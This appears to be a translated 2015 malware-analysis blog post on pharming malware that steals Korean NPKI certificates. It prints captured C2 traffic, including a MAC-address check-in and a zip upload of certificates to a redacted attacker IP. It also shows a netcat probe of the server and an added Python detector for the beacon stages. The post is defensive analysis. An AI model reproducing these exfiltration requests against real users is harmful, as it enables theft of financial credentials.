
Analysis diary

users.qzone.qq.com pharming

nopsled 2015. 4. 10. 17:03


GET /fcg-bin/cgi_get_portrait.fcg?uins=230*******?=7559 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: users.qzone.qq.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: QZHTTP-2.37.1

Content-Encoding: gzip

Cache-Control: max-age=86400

Content-Type: text/html

Content-Length: 119

Date: Fri, 10 Apr 2015 06:02:25 GMT

Connection: keep-alive

Vary: Accept-Encoding


..........+./*)J.,qN..qJL...V2260...0.0R..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T21.32..3..R.@..ZM..9..|... 


The Host address used to be r.qzone.qq.com, but lately it seems to have changed from r.qzone.qq.com to users.qzone.qq.com.


Connecting to r.qzone.qq.com used to return the nickname and so on just fine, but these days it spits out an ERROR.


Anyway, I don't know whether it is the qzone side that changed, but the pharming malware has been updated and is being distributed in a new form.


Its functionality is the same as the previous pharming.



GET /Count.asp?ver=001&mac=00-**-42-55-**-A4 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://www.com****.com/Count.asp?ver=001&mac=00-**-42-55-**-A4

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: www.com****.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 10 Apr 2015 06:02:26 GMT

Server: Microsoft-IIS/6.0

Content-Length: 0

Content-Type: text/html

Set-Cookie: ASPSESSIONIDCSAQTCSC=BHCANKBDIIPELCGFNPOLKJBA; path=/

Cache-control: private 


First, it connects to Count.asp to send the infection record to the server, where it is stored.


GET /ip.php?=18989 HTTP/1.1

Accept: */*

Accept-Language: ko

Cache-Control: no-cache

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705)

Host: 43.249.28.***

Connection: Keep-Alive


HTTP/1.1 200 OK

Connection: close

Date: Fri, 10 Apr 2015 06:02:16 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-Powered-By: PHP/5.2.17

Content-type: text/html


5b3412f55ff8ec4bd2a99b059084256d

Second, it connects to ip.php, which hashes the IP.




POST /upload.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://43.249.28.248/upload.php

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314

Content-Length: 295

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: 43.249.28.***

Cache-Control: no-cache


-----------------------------7da3e1bd0314

Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\nopsled\LOCALS~1\Temp\35c5c8545035186fd745d56e11d8692c.zip"

Content-Type: application/x-zip-compressed


PK....................

-----------------------------7da3e1bd0314--



HTTP/1.1 200 OK

Connection: close

Date: Fri, 10 Apr 2015 06:02:18 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-Powered-By: PHP/5.2.17

Content-Type:text/html;charset=utf-8

It uploads the NPKI (accredited digital certificate) via upload.php.




When connecting to Naver, the IP in the ESTABLISHED connection differed from Naver's IP, and a whois lookup on that IP returned HK.


And it tampers with DNS to steal users' financial information.
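The three beacon requests above (the Count.asp check-in carrying the MAC, the ip.php call, and the multipart .zip upload to upload.php) and the Host-versus-destination mismatch observed on the Naver connection can both be checked from captured HTTP traffic. The script below is an added example written for this post, not code from the original analysis: it parses raw requests, tags each beacon stage, and flags a request whose Host header names a portal domain while the TCP destination lies outside that domain's expected ranges. All host names, IPs and the allow-list are constructed placeholders, not real indicators.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed, redacted samples modelled on the captures in the post.
# Host names and IPs are placeholders (RFC 5737 ranges), not real indicators.
SAMPLE_TRAFFIC = [
    # (destination IP the client actually connected to, raw HTTP request)
    ("198.51.100.10",
     "GET /Count.asp?ver=001&mac=00-11-42-55-66-A4 HTTP/1.1\r\n"
     "Host: www.counter.example\r\n\r\n"),
    ("198.51.100.20",
     "GET /ip.php?=18989 HTTP/1.1\r\n"
     "Host: 198.51.100.20\r\n\r\n"),
    ("198.51.100.20",
     "POST /upload.php HTTP/1.1\r\n"
     "Host: 198.51.100.20\r\n"
     "Content-Type: multipart/form-data; boundary=----xyz\r\n\r\n"
     "------xyz\r\n"
     'Content-Disposition: form-data; name="upload_file1"; filename="C:\\Temp\\35c5c8.zip"\r\n'
     "Content-Type: application/x-zip-compressed\r\n\r\n"
     "PK\x03\x04...\r\n"
     "------xyz--\r\n"),
    # Portal request that went to the wrong server: Host says the portal,
    # but the connection was made to an IP outside the portal's known ranges.
    ("198.51.100.20",
     "GET / HTTP/1.1\r\n"
     "Host: naver.com\r\n\r\n"),
    # Benign request that reached the portal's own (constructed) range.
    ("203.0.113.5",
     "GET / HTTP/1.1\r\n"
     "Host: naver.com\r\n\r\n"),
]

# Constructed allow-list: assumed known-good ranges for the portal domain.
# In practice this comes from a trusted resolver or the operator's own data.
EXPECTED_RANGES = {
    "naver.com": [ipaddress.ip_network("203.0.113.0/24")],
}

BEACON_STAGES = {"checkin_with_mac", "ip_hash_beacon", "zip_upload"}
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}-){5}[0-9A-Fa-f]{2}$")
FILENAME_RE = re.compile(r'filename="([^"]+)"')


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {
        "method": method,
        "path": url.path,
        "query": parse_qs(url.query, keep_blank_values=True),
        "headers": headers,
        "body": body,
    }


def classify(dst_ip, raw):
    """Return the indicator tags that apply to one request."""
    req = parse_request(raw)
    findings = []
    path = req["path"].lower()
    host = req["headers"].get("host", "").split(":")[0].lower()

    # Stage 1: infection check-in that reports the victim's MAC address.
    if path.endswith("/count.asp") and "mac" in req["query"]:
        if MAC_RE.match(req["query"]["mac"][0]):
            findings.append("checkin_with_mac")

    # Stage 2: ip.php call whose response is a hash of the client IP.
    if path.endswith("/ip.php"):
        findings.append("ip_hash_beacon")

    # Stage 3: multipart POST of a .zip (the certificate archive) to upload.php.
    content_type = req["headers"].get("content-type", "")
    if req["method"] == "POST" and path.endswith("/upload.php") \
            and "multipart/form-data" in content_type:
        match = FILENAME_RE.search(req["body"])
        if match and match.group(1).lower().endswith(".zip"):
            findings.append("zip_upload")

    # Pharming indicator: Host names a watched domain, destination IP is not
    # within that domain's expected ranges.
    if host in EXPECTED_RANGES:
        addr = ipaddress.ip_address(dst_ip)
        if not any(addr in net for net in EXPECTED_RANGES[host]):
            findings.append("host_ip_mismatch")
    return findings


def scan(traffic):
    """Aggregate findings over a capture: which beacon stages appeared, and
    which (host, destination IP) pairs look redirected."""
    stages = set()
    pharming = []
    for dst_ip, raw in traffic:
        for finding in classify(dst_ip, raw):
            if finding == "host_ip_mismatch":
                host = parse_request(raw)["headers"]["host"].split(":")[0].lower()
                pharming.append((host, dst_ip))
            else:
                stages.add(finding)
    return {
        "stages": stages,
        "full_sequence": stages == BEACON_STAGES,
        "pharming_hosts": pharming,
    }


if __name__ == "__main__":
    print(scan(SAMPLE_TRAFFIC))
```

The `full_sequence` flag is what makes the check useful in practice: any one of the three requests is weak on its own, but all three from the same client within a short window matches the infection flow described above. The pharming rule needs a trustworthy allow-list for the watched domains; populating it from a resolver that the infected host also uses would defeat the purpose.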


C:\>nc 43.249.28.*** 80

GET / HTTP/1.1

Host : naver.com


HTTP/1.1 200 OK

Connection: close

Date: Fri, 10 Apr 2015 07:47:55 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-Powered-By: PHP/5.2.17

Content-type:text/html;charset=utf-8


IP 媛쒖닔??: 7174 媛??щ씪?붿뒿?덈떎.

C:\> 

While analyzing, the pharming IP was this one, so I changed the Host with netcat and connected, and some strange content came up.



What is this... it reads "IP count: 7174 have been uploaded."


This is a pharming campaign I have not seen before.


Is it the management server..


The IP changed during analysis, so analysis was halted.
